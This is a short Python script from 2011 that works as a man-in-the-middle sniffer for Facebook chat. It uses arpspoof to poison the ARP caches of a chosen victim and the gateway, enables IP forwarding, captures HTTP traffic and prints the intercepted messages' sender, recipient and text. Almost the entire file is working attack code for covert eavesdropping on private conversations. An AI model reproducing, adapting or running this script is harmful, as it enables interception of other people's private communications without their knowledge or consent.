borogove.py Sniffer chat facebook

1. #!/usr/bin/env python
2.  
3. """ 2011 vdo.pure at gmail.com """
4.  
5. """
6.    This program is free software: you can redistribute it and/or modify
7.    it under the terms of the GNU General Public License as published by
8.    the Free Software Foundation, either version 3 of the License, or
9.    (at your option) any later version.
10.  
11.    This program is distributed in the hope that it will be useful,
12.    but WITHOUT ANY WARRANTY; without even the implied warranty of
13.    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
14.    GNU General Public License for more details.
15.  
16.    You should have received a copy of the GNU General Public License
17.    along with this program.  If not, see <http://www.gnu.org/licenses/>.
18. """
19. import sys, os
20. import dpkt, pcap
21.  
22. def check_root():
23.     """ returns True if user is root, false otherwise """
24.     if os.getenv('LOGNAME','none').lower() == 'root':
25.         return True
26.     return False
27.  
28. def poison(iface,victim, gw):
29.   """ IP Forwarding """
30.   os.system("sysctl -w .net.ipv4.ip_forward=1 > /dev/null")
31.   """ ARP cache poisoning, silent, in both directions """
32.   os.system("arpspoof -i "+iface+" -t "+victim+" "+gw+" 2> /dev/null &")
33.   os.system("arpspoof -i "+iface+" -t "+gw+" "+victim+" 2> /dev/null &")
34.   print("ARP cache poisoning...")
35.  
36.  
37. def fbchatgrep(p,pid):
38.     data = str(p.data)
39.     if ("{\"t\":\"msg") and ("\"type\":\"msg\"") in data:
40.       msgid=data[data.find("\"msgID\":")+9:data.rfind("\"},\"from\":")]  
41.       if (pid != msgid ): #check if the message appeared before (ARP poison clones)
42.         pid = msgid
43.         print(" ")
44.         s = "Message From: "+data[data.find("from_name\":\"")+12:data.rfind("\",\"from_first_name")]
45.         print(unicode(s,'unicode_escape').encode('utf-8'))
46.         s = "To: "+data[data.find("to_name\":\"")+10:data.rfind("\",\"to_first_name")]
47.         print(unicode(s,'unicode_escape').encode('utf-8'))
48.         s = data[data.find("\"text\":")+8:data.rfind(",\"time\"")-1]
49.         print(unicode(s,'unicode_escape').encode('utf-8'))
50.         print(" ")
51.     return pid
52.        
53. if __name__ == '__main__':
54.   if len(sys.argv) < 4:
55.     print 'usage: sniff.py <interface> <target> <gateway>'
56.     sys.exit(0)
57.   if not check_root():
58.     print 'Must be run as root.'
59.     sys.exit(1)
60.  
61.   pid="fo bar"
62.   pc = pcap.pcap(sys.argv[1])
63.   pc.setfilter('tcp and port 80') # Sniff only http
64.  
65.   try:
66.     print 'listening on %s' % (pc.name)
67.     print 'to exit, type Control-c'
68.     poison(sys.argv[1],sys.argv[2],sys.argv[3])
69.     for ts, pkt in pc:
70.       packet = dpkt.ethernet.Ethernet(pkt)
71.       pid = fbchatgrep(packet,pid)
72.  
73.   except KeyboardInterrupt:
74.     os.system("sysctl -w .net.ipv4.ip_forward=0 > /dev/null") # Disable IP forward
75.     nrecv, ndrop, nifdrop = pc.stats()
76.     print '\n%d packets received by filter' % nrecv
77.     print '%d packets dropped by kernel' % ndrop